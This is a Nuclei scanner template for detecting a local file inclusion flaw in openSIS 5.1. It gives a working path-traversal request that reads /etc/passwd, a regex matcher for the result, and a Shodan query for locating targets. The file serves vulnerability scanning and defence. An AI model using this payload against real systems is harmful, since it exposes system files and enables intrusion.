nuclei-templates/vulnerabilities/other/opensis-lfi.yaml

36 lines
1.1 KiB
YAML

id: opensis-lfi
info:
name: openSIS 5.1 - Local File Inclusion
author: pikpikcu
severity: high
description: openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
reference:
- https://www.exploit-db.com/exploits/38039
metadata:
shodan-query: http.title:"openSIS"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: opensis,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
- "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/08/04